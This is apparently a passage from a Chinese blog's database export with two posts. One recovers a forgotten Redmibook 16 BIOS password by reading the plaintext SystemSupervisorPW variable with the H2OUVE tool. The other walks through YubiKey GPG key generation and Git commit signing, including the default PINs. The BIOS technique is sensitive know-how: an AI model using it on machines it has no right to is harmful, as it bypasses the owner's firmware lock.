Bios密码找回\n\n只能说这是一个困扰了我很久的问题，之前给bios随手设置了一个密码但是想不起来密码是什么了。所以才有了这篇踩坑日志。\n\n[H2O工具包下载](https://cloud.lenxy.net/s/jRfM)\n\n## 提取BIOS\n\n> :exclamation: 注: 使用前请执行WDFInst.exe 来初始化 \n\n使用H2OUVE对当前运行的bios进行提取\n\n![](../img/image-20230819192523604.png)\n\n## 查找密码\n\n点击Variable 找到SystemSupervisorPW 查看明文密码（对 bios里保存的是明文密码\n\n![](../img/image-20230819193340169.png)\n","slug":"redmibook-password","published":1,"updated":"2025-02-12T15:31:51.313Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bn000b7dp8963wabx2","content":"<h1 id=\"红米Redmibook-16-Bios密码找回\"><a href=\"#红米Redmibook-16-Bios密码找回\" class=\"headerlink\" title=\"红米Redmibook 16 Bios密码找回\"></a>红米Redmibook 16 Bios密码找回</h1><p>只能说这是一个困扰了我很久的问题，之前给bios随手设置了一个密码但是想不起来密码是什么了。所以才有了这篇踩坑日志。</p>\n<p><a href=\"https://cloud.lenxy.net/s/jRfM\">H2O工具包下载</a></p>\n<h2 id=\"提取BIOS\"><a href=\"#提取BIOS\" class=\"headerlink\" title=\"提取BIOS\"></a>提取BIOS</h2><blockquote>\n<p>:exclamation: 注: 使用前请执行WDFInst.exe 来初始化 </p>\n</blockquote>\n<p>使用H2OUVE对当前运行的bios进行提取</p>\n<p><img src=\"/../img/image-20230819192523604.png\"></p>\n<h2 id=\"查找密码\"><a href=\"#查找密码\" class=\"headerlink\" title=\"查找密码\"></a>查找密码</h2><p>点击Variable 找到SystemSupervisorPW 查看明文密码（对 bios里保存的是明文密码</p>\n<p><img src=\"/../img/image-20230819193340169.png\"></p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"红米Redmibook-16-Bios密码找回\"><a href=\"#红米Redmibook-16-Bios密码找回\" class=\"headerlink\" title=\"红米Redmibook 16 Bios密码找回\"></a>红米Redmibook 16 Bios密码找回</h1><p>只能说这是一个困扰了我很久的问题，之前给bios随手设置了一个密码但是想不起来密码是什么了。所以才有了这篇踩坑日志。</p>\n<p><a href=\"https://cloud.lenxy.net/s/jRfM\">H2O工具包下载</a></p>\n<h2 id=\"提取BIOS\"><a href=\"#提取BIOS\" class=\"headerlink\" title=\"提取BIOS\"></a>提取BIOS</h2><blockquote>\n<p>:exclamation: 注: 使用前请执行WDFInst.exe 来初始化 </p>\n</blockquote>\n<p>使用H2OUVE对当前运行的bios进行提取</p>\n<p><img src=\"/../img/image-20230819192523604.png\"></p>\n<h2 id=\"查找密码\"><a href=\"#查找密码\" class=\"headerlink\" title=\"查找密码\"></a>查找密码</h2><p>点击Variable 找到SystemSupervisorPW 查看明文密码（对 bios里保存的是明文密码</p>\n<p><img src=\"/../img/image-20230819193340169.png\"></p>\n"},{"title":"在Github Desktop中使用Yubikey来签署Commits","date":"2023-08-19T14:31:37.000Z","_content":"\n# 使用Yubikey来签署Git Commits\n\n既然准备就绪 那我们就开始吧。一共有两种方法去生成GPG Key。 其一本机生成 GPG KEY，然后将数据导入到 YubiKey。其二直接在 YubiKey 上生成密钥。我将介绍后者的步骤。\n\n需要的工具：[gpg4win](https://www.gpg4win.org/)\n\n安装完毕gpg4win后打开Kleopatra\n\n![](../img/image-20230819223720958.png)\n\n## 修改Yubikey的Admin PIN与PIN\n\n> Yubikey中pin的默认密码为123456 Admin Pin为12345678 \n>\n> :exclamation:多次密码错误会导致锁定\n\n插入Yubikey随后选择`SmartCards`\n\n![](../img/image-20230819223751168.png)\n\n选择下方的`Change PIN`与`Change Admin PIN`进行PIN修改\n\n![](../img/image-20230819224438162.png)\n\n## 生成gpg密钥并导入到Yubikey\n\n\n\n选择选项`Generate New Keys`（如果原yubikey中有数据，将会清空原有内容并替换为新的密钥\n\n![](../img/image-20230819223905735.png)\n\n填入签发人与邮箱\n\n![](../img/image-20230819223954118.png)\n\n需要多次输入Admin PIN与PIN 注意观察 别输错了\n\n![](../img/image-20230819224340009.png)\n\n最后一步，输入Key的密码短语\n\n![](../img/image-20230819224711639.png)\n\n生成完毕可以在`Certificates`处看到我们的证书，点击`Export`对公钥进行导出\n\n![](../img/082f8bb1b6c444c7ec382a5c422d62c1.png)\n\n将密钥使用记事本打开，并放入Github中的`GPG Keys`中\n\n![](../img/image-20230819225150919.png)\n\n## Git的配置\n\n如果您之前已将 Git 配置为在使用 `--gpg-sign` 进行签名时使用不同的密钥格式，请取消设置此配置，以便使用 `openpgp` 的默认格式。\n\n```shell\ngit config --global --unset gpg.format\n```\n\n使用 `gpg --list-secret-keys --keyid-format=long` 命令列出您拥有公钥和私钥的 GPG 密钥的长格式。\n\n```shell\ngpg --list-secret-keys --keyid-format=long\n```\n\n从 GPG 密钥列表中，复制您要使用的 GPG 密钥 ID 的完整形式。在此示例中，GPG 密钥 ID 为 `3AA5C34371567BD2` \n\n```\ngpg --list-secret-keys --keyid-format=long\n/Users/hubot/.gnupg/secring.gpg\n------------------------------------\nsec   4096R/3AA5C34371567BD2 2016-03-10 [expires: 2017-03-10]\nuid                          Hubot <hubot@example.com>\nssb   4096R/4BB6D45482678BE3 2016-03-10\n```\n\n要在 Git 中设置主 GPG 签名密钥，请粘贴下面的文本，并替换为您要使用的 GPG 主密钥 ID。在此示例中，GPG 密钥 ID 为 `3AA5C34371567BD2`\n\n```Shell\ngit config --global user.signingkey <你的主密钥ID>\n#Example:\ngit config --global user.signingkey 3AA5C34371567BD2\n#以下命令对所有 Git 提交进行签名\ngit config --global commit.gpgsign true\n```\n\n## 大功告成\n\n随后对commit即可对新的提交进行签名 同时在提交历史也可以看到本次是验证过的）\n\n![](../img/image-20230819231625612.png)\n","source":"_posts/yubikey-github.md","raw":"---\ntitle: 在Github Desktop中使用Yubikey来签署Commits\ndate: 2023-08-19 22:31:37\ntags: Yubikey的日常\n---\n\n# 使用Yubikey来签署Git Commits\n\n既然准备就绪 那我们就开始吧。一共有两种方法去生成GPG Key。 其一本机生成 GPG KEY，然后将数据导入到 YubiKey。其二直接在 YubiKey 上生成密钥。我将介绍后者的步骤。\n\n需要的工具：[gpg4win](https://www.gpg4win.org/)\n\n安装完毕gpg4win后打开Kleopatra\n\n![](../img/image-20230819223720958.png)\n\n## 修改Yubikey的Admin PIN与PIN\n\n> Yubikey中pin的默认密码为123456 Admin Pin为12345678 \n>\n> :exclamation:多次密码错误会导致锁定\n\n插入Yubikey随后选择`SmartCards`\n\n![](../img/image-20230819223751168.png)\n\n选择下方的`Change PIN`与`Change Admin PIN`进行PIN修改\n\n![](../img/image-20230819224438162.png)\n\n## 生成gpg密钥并导入到Yubikey\n\n\n\n选择选项`Generate New Keys`（如果原yubikey中有数据，将会清空原有内容并替换为新的密钥\n\n![](../img/image-20230819223905735.png)\n\n填入签发人与邮箱\n\n![](../img/image-20230819223954118.png)\n\n需要多次输入Admin PIN与PIN 注意观察 别输错了\n\n![](../img/image-20230819224340009.png)\n\n最后一步，输入Key的密码短语\n\n![](../img/image-20230819224711639.png)\n\n生成完毕可以在`Certificates`处看到我们的证书，点击`Export`对公钥进行导出\n\n![](../img/082f8bb1b6c444c7ec382a5c422d62c1.png)\n\n将密钥使用记事本打开，并放入Github中的`GPG Keys`中\n\n![](../img/image-20230819225150919.png)\n\n## Git的配置\n\n如果您之前已将 Git 配置为在使用 `--gpg-sign` 进行签名时使用不同的密钥格式，请取消设置此配置，以便使用 `openpgp` 的默认格式。\n\n```shell\ngit config --global --unset gpg.format\n```\n\n使用 `gpg --list-secret-keys --keyid-format=long` 命令列出您拥有公钥和私钥的 GPG 密钥的长格式。\n\n```shell\ngpg --list-secret-keys --keyid-format=long\n```\n\n从 GPG 密钥列表中，复制您要使用的 GPG 密钥 ID 的完整形式。在此示例中，GPG 密钥 ID 为 `3AA5C34371567BD2` \n\n```\ngpg --list-secret-keys --keyid-format=long\n/Users/hubot/.gnupg/secring.gpg\n------------------------------------\nsec   4096R/3AA5C34371567BD2 2016-03-10 [expires: 2017-03-10]\nuid                          Hubot <hubot@example.com>\nssb   4096R/4BB6D45482678BE3 2016-03-10\n```\n\n要在 Git 中设置主 GPG 签名密钥，请粘贴下面的文本，并替换为您要使用的 GPG 主密钥 ID。在此示例中，GPG 密钥 ID 为 `3AA5C34371567BD2`\n\n```Shell\ngit config --global user.signingkey <你的主密钥ID>\n#Example:\ngit config --global user.signingkey 3AA5C34371567BD2\n#以下命令对所有 Git 提交进行签名\ngit config --global commit.gpgsign true\n```\n\n## 大功告成\n\n随后对commit即可对新的提交进行签名 同时在提交历史也可以看到本次是验证过的）\n\n![](../img/image-20230819231625612.png)\n","slug":"yubikey-github","published":1,"updated":"2025-02-12T15:31:51.313Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bn000e7dp8aa5vb91b","content":"<h1 id=\"使用Yubikey来签署Git-Commits\"><a href=\"#使用Yubikey来签署Git-Commits\" class=\"headerlink\" title=\"使用Yubikey来签署Git Commits\"></a>使用Yubikey来签署Git Commits</h1><p>既然准备就绪 那我们就开始吧。一共有两种方法去生成GPG Key。 其一本机生成 GPG KEY，然后将数据导入到 YubiKey。其二直接在 YubiKey 上生成密钥。我将介绍后者的步骤。</p>\n<p>需要的工具：<a href=\"https://www.gpg4win.org/\">gpg4win</a></p>\n<p>安装完毕gpg4win后打开Kleopatra</p>\n<p><img src=\"/../img/image-20230819223720958.png\"></p>\n<h2 id=\"修改Yubikey的Admin-PIN与PIN\"><a href=\"#修改Yubikey的Admin-PIN与PIN\" class=\"headerlink\" title=\"修改Yubikey的Admin PIN与PIN\"></a>修改Yubikey的Admin PIN与PIN</h2><blockquote>\n<p>Yubikey中pin的默认密码为123456 Admin Pin为12345678 </p>\n<p>:exclamation:多次密码错误会导致锁定</p>\n</blockquote>\n<p>插入Yubikey随后选择<code>SmartCards</code></p>\n<p><img src=\"/../img/image-20230819223751168.png\"></p>\n<p>选择下方的<code>Change PIN</code>与<code>Change Admin PIN</code>进行PIN修改</p>\n<p><img src=\"/../img/image-20230819224438162.png\"></p>\n<h2 id=\"生成gpg密钥并导入到Yubikey\"><a href=\"#生成gpg密钥并导入到Yubikey\" class=\"headerlink\" title=\"生成gpg密钥并导入到Yubikey\"></a>生成gpg密钥并导入到Yubikey</h2><p>选择选项<code>Generate New Keys</code>（如果原yubikey中有数据，将会清空原有内容并替换为新的密钥</p>\n<p><img src=\"/../img/image-20230819223905735.png\"></p>\n<p>填入签发人与邮箱</p>\n<p><img src=\"/../img/image-20230819223954118.png\"></p>\n<p>需要多次输入Admin PIN与PIN 注意观察 别输错了</p>\n<p><img src=\"/../img/image-20230819224340009.png\"></p>\n<p>最后一步，输入Key的密码短语</p>\n<p><img src=\"/../img/image-20230819224711639.png\"></p>\n<p>生成完毕可以在<code>Certificates</code>处看到我们的证书，点击<code>Export</code>对公钥进行导出</p>\n<p><img src=\"/../img/082f8bb1b6c444c7ec382a5c422d62c1.png\"></p>\n<p>将密钥使用记事本打开，并放入Github中的<code>GPG Keys</code>中</p>\n<p><img src=\"/../img/image-20230819225150919.png\"></p>\n<h2 id=\"Git的配置\"><a href=\"#Git的配置\" class=\"headerlink\" title=\"Git的配置\"></a>Git的配置</h2><p>如果您之前已将 Git 配置为在使用 <code>--gpg-sign</code> 进行签名时使用不同的密钥格式，请取消设置此配置，以便使用 <code>openpgp</code> 的默认格式。</p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs shell\">git config --global --unset gpg.format<br></code></pre></td></tr></table></figure>\n\n<p>使用 <code>gpg --list-secret-keys --keyid-format=long</code> 命令列出您拥有公钥和私钥的 GPG 密钥的长格式。</p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs shell\">gpg --list-secret-keys --keyid-format=long<br></code></pre></td></tr></table></figure>\n\n<p>从 GPG 密钥列表中，复制您要使用的 GPG 密钥 ID 的完整形式。在此示例中，GPG 密钥 ID 为 <code>3AA5C34371567BD2</code> </p>\n<figure class=\"highlight asciidoc\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs asciidoc\">gpg --list-secret-keys --keyid-format=long<br><span class=\"hljs-section\">/Users/hubot/.gnupg/secring.gpg</span><br><span class=\"hljs-section\">------------------------------------</span><br>sec   4096R/3AA5C34371567BD2 2016-03-10 [expires: 2017-03-10]<br>uid                          Hubot &lt;hubot@example.com&gt;<br>ssb   4096R/4BB6D45482678BE3 2016-03-10<br></code></pre></td></tr></table></figure>\n\n<p>要在 Git 中设置主 GPG 签名密钥，请粘贴下面的文本，并替换为您要使用的 GPG 主密钥 ID。在此示例中，GPG 密钥 ID 为 <code>3AA5C34371567BD2</code></p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs Shell\">git config --global user.signingkey &lt;你的主密钥ID&gt;<br><span class=\"hljs-meta prompt_\">#</span><span class=\"language-bash\">Example:</span><br>git config --global user.signingkey 3AA5C34371567BD2<br><span class=\"hljs-meta prompt_\">#</span><span class=\"language-bash\">以下命令对所有 Git 提交进行签名</span><br>git config --global commit.gpgsign true<br></code></pre></td></tr></table></figure>\n\n<h2 id=\"大功告成\"><a href=\"#大功告成\" class=\"headerlink\" title=\"大功告成\"></a>大功告成</h2><p>随后对commit即可对新的提交进行签名 同时在提交历史也可以看到本次是验证过的）</p>\n<p><img src=\"/../img/image-20230819231625612.png\"></p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"使用Yubikey来签署Git-Commits\"><a href=\"#使用Yubikey来签署Git-Commits\" class=\"headerlink\" title=\"使用Yubikey来签署Git Commits\"></a>使用Yubikey来签署Git Commits</h1><p>既然准备就绪 那我们就开始吧。一共有两种方法去生成GPG Key。 其一本机生成 GPG KEY，然后将数据导入到 YubiKey。其二直接在 YubiKey 上生成密钥。我将介绍后者的步骤。</p>\n<p>需要的工具：<a href=\"https://www.gpg4win.org/\">gpg4win</a></p>\n<p>安装完毕gpg4win后打开Kleopatra</p>\n<p><img src=\"/../img/image-20230819223720958.png\"></p>\n<h2 id=\"修改Yubikey的Admin-PIN与PIN\"><a href=\"#修改Yubikey的Admin-PIN与PIN\" class=\"headerlink\" title=\"修改Yubikey的Admin PIN与PIN\"></a>修改Yubikey的Admin PIN与PIN</h2><blockquote>\n<p>Yubikey中pin的默认密码为123456 Admin Pin为12345678 </p>\n<p>:exclamation:多次密码错误会导致锁定</p>\n</blockquote>\n<p>插入Yubikey随后选择<code>SmartCards</code></p>\n<p><img src=\"/../img/image-20230819223751168.png\"></p>\n<p>选择下方的<code>Change PIN</code>与<code>Change Admin PIN</code>进行PIN修改</p>\n<p><img src=\"/../img/image-20230819224438162.png\"></p>\n<h2 id=\"生成gpg密钥并导入到Yubikey\"><a href=\"#生成gpg密钥并导入到Yubikey\" class=\"headerlink\" title=\"生成gpg密钥并导入到Yubikey\"></a>生成gpg密钥并导入到Yubikey</h2><p>选择选项<code>Generate New Keys</code>（如果原yubikey中有数据，将会清空原有内容并替换为新的密钥</p>\n<p><img src=\"/../img/image-20230819223905735.png\"></p>\n<p>填入签发人与邮箱</p>\n<p><img src=\"/../img/image-20230819223954118.png\"></p>\n<p>需要多次输入Admin PIN与PIN 注意观察 别输错了</p>\n<p><img src=\"/../img/image-20230819224340009.png\"></p>\n<p>最后一步，输入Key的密码短语</p>\n<p><img src=\"/../img/image-20230819224711639.png\"></p>\n<p>生成完毕可以在<code>Certificates</code>处看到我们的证书，点击<code>Export</code>对公钥进行导出</p>\n<p><img src=\"/../img/082f8bb1b6c444c7ec382a5c422d62c1.png\"></p>\n<p>将密钥使用记事本打开，并放入Github中的<code>GPG Keys</code>中</p>\n<p><img src=\"/../img/image-20230819225150919.png\"></p>\n<h2 id=\"Git的配置\"><a href=\"#Git的配置\" class=\"headerlink\" title=\"Git的配置\"></a>Git的配置</h2><p>如果您之前已将 Git 配置为在使用 <code>--gpg-sign</code> 进行签名时使用不同的密钥格式，请取消设置此配置，以便使用 <code>openpgp</code> 的默认格式。</p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs shell\">git config --global --unset gpg.format<br></code></pre></td></tr></table></figure>\n\n<p>使用 <code>gpg --list-secret-keys --keyid-format=long</code> 命令列出您拥有公钥和私钥的 GPG 密钥的长格式。</p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs shell\">gpg --list-secret-keys --keyid-format=long<br></code></pre></td></tr></table></figure>\n\n<p>从 GPG 密钥列表中，复制您要使用的 GPG 密钥 ID 的完整形式。在此示例中，GPG 密钥 ID 为 <code>3AA5C34371567BD2</code> </p>\n<figure class=\"highlight asciidoc\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs asciidoc\">gpg --list-secret-keys --keyid-format=long<br><span class=\"hljs-section\">/Users/hubot/.gnupg/secring.gpg</span><br><span class=\"hljs-section\">------------------------------------</span><br>sec   4096R/3AA5C34371567BD2 2016-03-10 [expires: 2017-03-10]<br>uid                          Hubot &lt;hubot@example.com&gt;<br>ssb   4096R/4BB6D45482678BE3 2016-03-10<br></code></pre></td></tr></table></figure>\n\n<p>要在 Git 中设置主 GPG 签名密钥，请粘贴下面的文本，并替换为您要使用的 GPG 主密钥 ID。在此示例中，GPG 密钥 ID 为 <code>3AA5C34371567BD2</code></p>\n<figure class=\"highlight shell\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs Shell\">git config --global user.signingkey &lt;你的主密钥ID&gt;<br><span class=\"hljs-meta prompt_\">#</span><span class=\"language-bash\">Example:</span><br>git config --global user.signingkey 3AA5C34371567BD2<br><span class=\"hljs-meta prompt_\">#</span><span class=\"language-bash\">以下命令对所有 Git 提交进行签名</span><br>git config --global commit.gpgsign true<br></code></pre></td></tr></table></figure>\n\n<h2 id=\"大功告成\"><a href=\"#大功告成\" class=\"headerlink\" title=\"大功告成\"></a>大功告成</h2><p>随后对commit即可对新的提交进行签名 同时在提交历史也可以看到本次是验证过的）</p>\n<p><img src=\"/../img/image-20230819231625612.png\"></p>\n"}],"PostAsset":[],"PostCategory":[],"PostTag":[{"post_id":"cm722r5bk00017dp8djox8qia","tag_id":"cm722r5bl00037dp83swmgadz","_id":"cm722r5bn00087dp8f1mj9avw"},{"post_id":"cm722r5bn00067dp82d3v5e9f","tag_id":"cm722r5bl00037dp83swmgadz","_id":"cm722r5bn000a7dp8hmxl9luf"},{"post_id":"cm722r5bl00027dp8512q188k","tag_id":"cm722r5bl00037dp83swmgadz","_id":"cm722r5bn000d7dp8638l8lkp"},{"post_id":"cm722r5bm00047dp826oe6i8h","tag_id":"cm722r5bn000c7dp84x8yfocm","_id":"cm722r5bo000g7dp849n15mdr"},{"post_id":"cm722r5bm00057dp8ewbtcfs2","tag_id":"cm722r5bn000c7dp84x8yfocm","_id":"cm722r5bo000i7dp8d6uwblns"},{"post_id":"cm722r5bn00097dp830yu0c40","tag_id":"cm722r5bn000c7dp84x8yfocm","_id":"cm722r5bo000k7dp887075to9"},{"post_id":"cm722r5bn000b7dp8963wabx2","tag_id":"cm722r5bo000j7dp8fu8qdkjg","_id":"cm722r5bo000m7dp8282zbnmq"},{"post_id":"cm722r5bn000e7dp8aa5vb91b","tag_id":"cm722r5bo000l7dp8gcxi572i","_id":"cm722r5bo000n7dp88v0x9ti8"}],"Tag":[{"name":"病毒分析","_id":"cm722r5bl00037dp83swmgadz"},{"name":"沙箱分析","_id":"cm722r5bn000c7dp84x8yfocm"},{"name":"踩坑日志","_id":"cm722r5bo000j7dp8fu8qdkjg"},{"name":"Yubikey的日常","_id":"cm722r5bo000l7dp8gcxi572i"}]}}